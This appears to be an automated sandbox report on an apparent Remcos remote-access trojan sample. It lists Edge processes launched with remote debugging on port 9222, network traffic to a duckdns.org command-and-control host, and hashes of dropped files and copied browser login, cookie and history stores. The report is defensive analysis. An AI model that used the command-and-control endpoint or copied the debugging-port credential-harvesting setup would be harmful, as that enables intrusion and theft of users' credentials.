C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 dvlqrd8dhs.duckdns.org udp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 245.20.216.154.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
GB 172.217.16.234:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 172.217.16.234:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

memory/3128-4-0x00007FFA206F3000-0x00007FFA206F5000-memory.dmp

memory/3128-10-0x000001935BAC0000-0x000001935BAE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xql4hzur.we4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3128-15-0x00007FFA206F0000-0x00007FFA211B1000-memory.dmp

memory/3128-16-0x00007FFA206F0000-0x00007FFA211B1000-memory.dmp

memory/3128-19-0x00007FFA206F3000-0x00007FFA206F5000-memory.dmp

memory/3128-20-0x00007FFA206F0000-0x00007FFA211B1000-memory.dmp

memory/3128-23-0x00007FFA206F0000-0x00007FFA211B1000-memory.dmp

memory/744-24-0x0000000002FE0000-0x0000000003016000-memory.dmp

memory/744-25-0x0000000005C40000-0x0000000006268000-memory.dmp

memory/744-26-0x0000000005920000-0x0000000005942000-memory.dmp

memory/744-27-0x0000000005AC0000-0x0000000005B26000-memory.dmp

memory/744-28-0x0000000005BA0000-0x0000000005C06000-memory.dmp

memory/744-34-0x0000000006270000-0x00000000065C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 71444def27770d9071039d005d0323b7
SHA1 cef8654e95495786ac9347494f4417819373427e
SHA256 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512 a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

memory/744-40-0x0000000006900000-0x000000000691E000-memory.dmp

memory/744-41-0x0000000006930000-0x000000000697C000-memory.dmp

memory/744-42-0x0000000008140000-0x00000000087BA000-memory.dmp

memory/744-43-0x0000000006E90000-0x0000000006EAA000-memory.dmp

memory/744-44-0x0000000007BB0000-0x0000000007C46000-memory.dmp

memory/744-45-0x0000000007B10000-0x0000000007B32000-memory.dmp

memory/744-46-0x0000000008D70000-0x0000000009314000-memory.dmp

C:\Users\Admin\AppData\Roaming\Finansieringsreglen.Obj

MD5 1cb290450b721be996587879d8a83c58
SHA1 86e9f667b6f6f4fc5516c81c6962e81056ae15e8
SHA256 4120967e3a52f6437b605b5aa39961ca6d5a0e49572357f71efad30727a65323
SHA512 e900d8a7fe53559e5c292997f8ab82d77a86b295a195a92ef9ffd4e9418b6733d7fc74394d473bea5d17383d8f0ce1749252a25b2e59f45a2b39a50db7d8521a

memory/744-48-0x0000000009320000-0x000000000D778000-memory.dmp

memory/4276-61-0x0000000001200000-0x0000000002454000-memory.dmp

memory/4276-62-0x0000000001200000-0x0000000002454000-memory.dmp

memory/4276-70-0x00000000224E0000-0x0000000022514000-memory.dmp

memory/4276-74-0x00000000224E0000-0x0000000022514000-memory.dmp

memory/4276-73-0x00000000224E0000-0x0000000022514000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 0fa56a1546598114b10cfaa44368fdb1
SHA1 fab7a6e318bc64598d9c80577935a45ff87db683
SHA256 15ba35dcc4f8ff4a42fa011a403e85cc2339351e20e8c7e9cfb1eab5a2599b4a
SHA512 93f4845db751233813cc53cbb7a5abc54d73a5f93b2f1c8bdcc28c9c64b5310713d0e373e6ea41ec1c2491f4876585b43b0280ce53d72ffb0a1dc73712131005

\??\pipe\crashpad_2208_DKXEALJUARHXRMFW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 5887bfb6dbbb91afdc00013449507007
SHA1 50043cde39b6734191ec785ebfac1ea07aa4b997
SHA256 220139cea8e26ff9218f00e3ab8fa04edfcc2e2c00a02da08ea6a19c80bd5253
SHA512 0a99c2788b92f4cd641a80fa485e98d2915289346ed9ddf6887d7e4699d4f56367aecf08c2609aac1de234f518cb4ebb59533472c074acf722fab4a49e21d389

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 e2f6740589a4b570eae3bde32ad6e60e
SHA1 f480cb3fe10ff7338916edbea9ed63bd01175122
SHA256 56cf9ec20fd3892b742bf6518f974734d753e9fd5157b33199d8b82c8a09c318
SHA512 4148c0ab36f82aa31d3343eeae7c16e7c66b948aa0124efa207b76ae067b33c8b4495faa25f6f2241408bc400f45e86b3c33ec0d2c5323065b320747565ac42e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/3604-122-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3604-136-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1272-135-0x0000000000400000-0x0000000000424000-memory.dmp

memory/60-124-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1272-141-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

memory/60-169-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1272-140-0x0000000000400000-0x0000000000424000-memory.dmp

memory/3604-139-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3604-138-0x0000000000400000-0x0000000000478000-memory.dmp

memory/60-174-0x0000000000400000-0x0000000000462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/4276-214-0x0000000023020000-0x0000000023039000-memory.dmp

memory/4276-213-0x0000000023020000-0x0000000023039000-memory.dmp

memory/4276-210-0x0000000023020000-0x0000000023039000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chkhknudvoswssthjrngsvoistntkipd

MD5 16dfb23eaa7972c59c36fcbc0946093b
SHA1 1e9e3ff83a05131575f67e202d352709205f20f8
SHA256 36c49c94327c8cadcad4c0d2b3a8f5162fc7bb86624923484476c5f7b960bc4c
SHA512 a8b38b5e7bf886b78c5c7f01234b44647a252d4dfbcc06c99b863f8e160e3cfc151b2a83b8b49e09d13e8547419467da4bffbb8dee5fc6740032eb7c839d89dc

memory/4276-215-0x0000000001200000-0x0000000002454000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 250543ffe3d1b598df115797f63e342e
SHA1 d6a843951169281d22dbb4b35859d6ff679a2cd9
SHA256 ee1b9b7acee430ef7ff60e10e9e27d48808e2d6c2a7acafcf1dfe7d45da8769e
SHA512 8df5027abfa6662272dbab3a9866211d5e59c41e46371e0d1c629055d81aae3b09fbb72647f9cece8f1cca457b26a2bb93b462828314eb6ff99482f7ac271ed6

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 6f5c1fcb9e6ce515b7dd5a33b9fe0522
SHA1 70b09f58158c8527b4b0f96fadf65e793954fac4
SHA256 54fe8d1f234a0683b384161e573c0b8ee1d74a62ba6b55a6c19c283535d1fc06
SHA512 5ad3fe308e546c450a0e02bd5c1124eb6eed9facec70953f63066e256d15c5f63e78b4777823348d8dfb477c156ce52604b5ce4459e719ce71a80fd03f271e54

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 0c873bc65e46310e63d138da5d942b2f
SHA1 d66c146f1e2ceac2fd61dceac71f0a34581ab62f
SHA256 1c4ce8ddf0febf61ae25f3927ae5536b7bafd6989c5c36e50e5b141454975d92
SHA512 1f4e9ef51969503a74dc5410693a399edbcbe78d83e89080b6d9144fa8b9177cbfed6430db67ff95c6cc9f11067a3621f9723412e306d8d84b3b29605a2539da

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 01cc238c7c7dacfc7912293fc4a02231
SHA1 e275ed724624209c6f6f7f63a7498174dadcfaab
SHA256 9293fc19174885f2b644d558e3384084afd38c8a0f4200c50a3a0b990a99478d
SHA512 3b0b9fe4a9e231e9891ccd1334686861fc572a3f469891c4bf08b35ac3c5da6a11e6c97f61bc70e3bd7672432903fc64819446324bc5436471361843b5d8893b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 3c0bfd63a3297d205828b4fafb541f9c
SHA1 a7b1a1d9ba8d677a37c9eb4bb94cd48c50688035
SHA256 553e16e05b9f1465f9ddbfadf94ee391c35f71e080ec9b69847b2dac5ef6a538
SHA512 7ba2a862f8c75eb191eb70d9022d610dc240e4f04d7b345004c1ef18fe2d78e2e69d8b61b8dd86d8c4b4206b5a1aedfae848645445596ba383cd299472baad0f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

MD5 cc261cf3901bb655e7d32d2d54404274
SHA1 f2577258d2d6cc94c24657f9f7fb97f09aeae210
SHA256 2435c21bef9c32710f8df48ddee92f8a721695f80baf648b75ac502ff2315eb1
SHA512 fc4413fca912a329333e297ab08e81716238242ac7e12503f44bfbd3908abf485a03ce4a60c43a7d34f9ba63dc2af32813f4c70938cf8f456b1433222e4afb82

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

MD5 4e77454d59350e041b895c26e3e9fd9a
SHA1 4df74a17c5b40fa9013846b21b33bc5624c17763
SHA256 43b61c6e3c002538f7c0e49528f6fffe2e0cea9d31639cd7240265451a1e7bc0
SHA512 4e46349615209067d739b3b8c951aac2960896451ea2c7f476a50b2a7457b30315329c95237acadd263da50c52c0d68dd945ceb50c9521949105ec446ce230d0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

MD5 b40e1be3d7543b6678720c3aeaf3dec3
SHA1 7758593d371b07423ba7cb84f99ebe3416624f56
SHA256 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4
SHA512 fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

MD5 9638433c919415e2b40b48e7a63218fb
SHA1 9449eaddecfd9b2eaf729091ea22933cb5312a36
SHA256 109db5fbd075b1fc639682cccb72b36a966463d5cfe54d998126246de02b1c81
SHA512 4382801e364580a7936bce469bf0dc262d356918bbef2519acd694c28d4ef5f6c9387e3ae21170c07dda52314f4663436bcca24ed87e37d2c311010df25118c9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

MD5 d505f72b88268a45291d67d093e54faa
SHA1 162394efafb09579c9fb3acb936d90c466e59b18
SHA256 1cf750bf290394e33b4038ad11cbeeae780e53b341aa6c87ea8936301abcb3d9
SHA512 4fbd65aa3a66adf486233bab8cc0753c36b35a041077fddb7df82483d37359bf4f3cb761d160f8ffaedfe65c80f1515a25a5e394f1e3fcf715e7a9d942c1cb7d

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 fb9b644175d9cb9412afa02e5162aa36
SHA1 549e99099f845f414e650dc71c41a2165b29f64a
SHA256 ef5bacdc32263d63240194ea3cdf60c69dffb9544e0d59730d35fcf5d89fd6d8
SHA512 b021b24fac3cba795ea5165108a79853a9f2b1c3ba78359c4f251e3b1953fc6b1ab753658c2bc8d11dfcb2dd5b696d89240e8c99fd41a5146615c8553f8905f2

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 5386b112fa0b22a45f72028ce295ee8b
SHA1 d3d2e5eed63f1a936bef8f91fd5cd7d428d97152
SHA256 292c54382483f19e3d6b68359299d9fb2a328d4545085dd1d0fe01fddb48eeba
SHA512 3f1fb663e1e7c04dc417f0c65db6de30acc3706f1a45c640fde8e64978db7a0229ed624f07914b6e25ced7a5a44145243036c4949a5f367e66969bf70d909819

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History-journal

MD5 171b7051426ca2a775baf46001c5db7e
SHA1 425f2061166624a7eb8fa42e81e0288de84f9e79
SHA256 37375b0e4c192941596362ba272432a058a05409d80ab174dd57e0a9a61d4820
SHA512 b894dcd2fb9a0d0c234888932b0bcb43893c2c0569634ffa34b93d2eb1b486c73ebb216a692ead98af7115ce0ccab74a365be4e5a90b630f3a525b6991d8cb42

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

MD5 d30bfa66491904286f1907f46212dd72
SHA1 9f56e96a6da2294512897ea2ea76953a70012564
SHA256 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907
SHA512 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 e2dc44a026963fe2d1fc346d62753cea
SHA1 30525054dd963e769a965f3f0da2b1906a15ded3
SHA256 ef7f1394758771343186e3ea3aa81f4e5ec651dc61f7232bb4db500f6aa7a0b6
SHA512 c71fbf0fc9db07864d5898aeabeca9df8808d68cc81760f9c38a817c601a7128c23fbd1b849dcc303c493fe86a488100dd8b4e5f68ca58f3404aa67bd32f1b28

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

MD5 7491ab4fa7a0a27374ac92170791e306
SHA1 6cc00c1f030f42de8a5171c39892417f183d5f9e
SHA256 25527aa789a62da59c65f818f0a4c808c5d92d97d5709727ae9e27628f7455d1
SHA512 2c7c1dab2b75be52197e88379172ecb3e53ff0cd3d991de178cd42d7115436a6a09e9529bd37eabc7784234801c9a1f4b6c0888161ccf795d7c472f367e5e051

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

MD5 986962efd2be05909f2aaded39b753a6
SHA1 657924eda5b9473c70cc359d06b6ca731f6a1170
SHA256 d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889
SHA512 e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

MD5 18c9cea375cf4b2a2ca54bed406fd06d
SHA1 9ba17aae6a7a71452f5cbdaa5bc1344d577ea74d
SHA256 03c58ddf8bbd50a5c32b528fcda296460596dc783b7c13de9a79c18a7705331d
SHA512 c52479475d737f23fa41ab332af627c5e8e470348b882d8e30f8cd230da3e41e37895f4d7795d4691f7032bac686a1d15b113d6fa1dae76915c5c22ec672a6e1

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

MD5 6760fa88b770d00e6334878166959aa1
SHA1 24f2e60b17de54973be874108b4840cd28c5e26a
SHA256 7e05b42629135a2f66992c579be145fcef93edcebcbe1d86e36445c840c5aaa0
SHA512 a4c6344d6b89eacae25e9496ad296205670d5730edb8b81a518adfab8d39b97028209f79c00a80edf371328b14aa4dbe3912e49a284386d9877d8029adb0c1e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

MD5 9082ba76dad3cf4f527b8bb631ef4bb2
SHA1 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0
SHA256 bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd
SHA512 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

MD5 69449520fd9c139c534e2970342c6bd8
SHA1 230fe369a09def748f8cc23ad70fd19ed8d1b885
SHA256 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277
SHA512 ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

MD5 4cc255b86f6504ceeb1af356e6c01d62
SHA1 dfb3f9a85b0d829796f76ded4757ef6f71a9f099
SHA256 abe1f09328c21fa8ca17a7fb7f10f52097a870d444b1cf07bb2a0f3ba19c36de
SHA512 e68870e077e9d13021568de82f856b4da4c424eec1a096b84a1b2c076272b37dbb73f80f4020d0501697f32ca700b1a86df2bb9bf4b710016162c560e38ac7a7

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

MD5 e8f996d273f11fdfb23b6ae9cb680c29
SHA1 c4c64f4e69da8a7c1ed74bf0280455da14198e66
SHA256 55a10d1fd8166e5def4bac526e2894c10faddb6170fe92aa2b8eaceb7cb80aaa
SHA512 75b15db2c14fcb6ddbd91ce37c94a8c9af1d03c6e2baddaf1b10bdd65725db24033142f39f3d45cb567f29260a392d5c4f8b97bcb44b23a9ea53d752800f427d

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

MD5 03525eea8fa91e23be9afaf02984442e
SHA1 2057e00aae63b3366292c2d1bbed170d4f16bab3
SHA256 6e411c947c0b1d607ece9c48b3f457b296cdfbe8f58410b17c46b398ad3652b4
SHA512 5e5259505edd637a8a61eff92eddee1a50d628df02b48a0c87251cbaf5d3b80a4ad82b042b19bbb39086c6f56ab795fded6c19f6eccf7d83e7e25611c2bcb9a6

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\d82c04e3-ab83-4e08-862e-dde18c59f356.tmp

MD5 0aa75cdc0d0f81006227bd862e01fdc3
SHA1 77ca4674def83a203f14233139f8813cd30e5b2b
SHA256 9325ce83ea656ff33dc9e5edd13a9f696cfd33b646acd945012f92309bbed58a
